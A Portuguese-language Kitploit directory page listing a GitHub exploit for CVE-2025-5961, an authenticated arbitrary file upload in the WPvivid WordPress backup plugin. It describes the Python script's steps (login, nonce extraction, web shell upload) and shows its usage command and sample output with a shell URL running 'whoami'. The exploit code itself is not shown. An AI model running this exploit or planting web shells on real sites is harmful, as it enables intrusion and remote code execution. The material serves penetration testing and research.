Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-5961 — Migração, Backup e Staging – WPvivid Backup & Migration <= 0.9.116 - Upload arbitrário de arquivos autenticado (Administrador+) | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-5961
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-5961

CVE-2025-5961

Migração, Backup e Staging – WPvivid Backup & Migration <= 0.9.116 - Upload arbitrário de arquivos autenticado (Administrador+)

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Upload Arbitrário de Arquivos Autenticado (Administrador+)

📈 Esta vulnerabilidade afeta um plugin com mais de 700.000+ instalações


📝 Detalhes do CVE

  • CVE: CVE-2025-5961
  • CVSS: 7.2 (Alta)
  • Publicado: 3 de julho de 2025

🔍 Descrição

O plugin Migration, Backup, Staging – WPvivid Backup & Migration para WordPress é vulnerável a uploads arbitrários de arquivos devido à falta de validação do tipo de arquivo na função wpvivid_upload_import_files em todas as versões até, e incluindo, 0.9.116.

Isso permite que atacantes autenticados (nível Administrador ou superior) façam upload de arquivos arbitrários no servidor, potencialmente permitindo a execução remota de código.


🧰 Script

Este repositório contém um script de exploit para CVE-2025-5961, escrito em Python, que:

  • Verifica a versão do plugin.
  • Faz login como Administrador.
  • Extrai o nonce necessário da página do plugin.
  • Faz upload de um payload de web shell.
  • Exibe a URL para acessar o shell.

🖥️ Exemplo de Uso

root@kitploit:~
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123

⚙️ Uso

root@kitploit:~
$ python3 CVE-2025-5961.py -h

usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL
  -un, --username USERNAME
                        Admin username
  -p, --password PASSWORD

📊 Exemplo de Saída

root@kitploit:~
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/

⚖️ Isenção de Responsabilidade

Este script é fornecido apenas para fins educacionais e de pesquisa.
O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.


✍️ Autor

Khaled Alenazi (Nxploited)
🌐 GitHub

Baixar ferramenta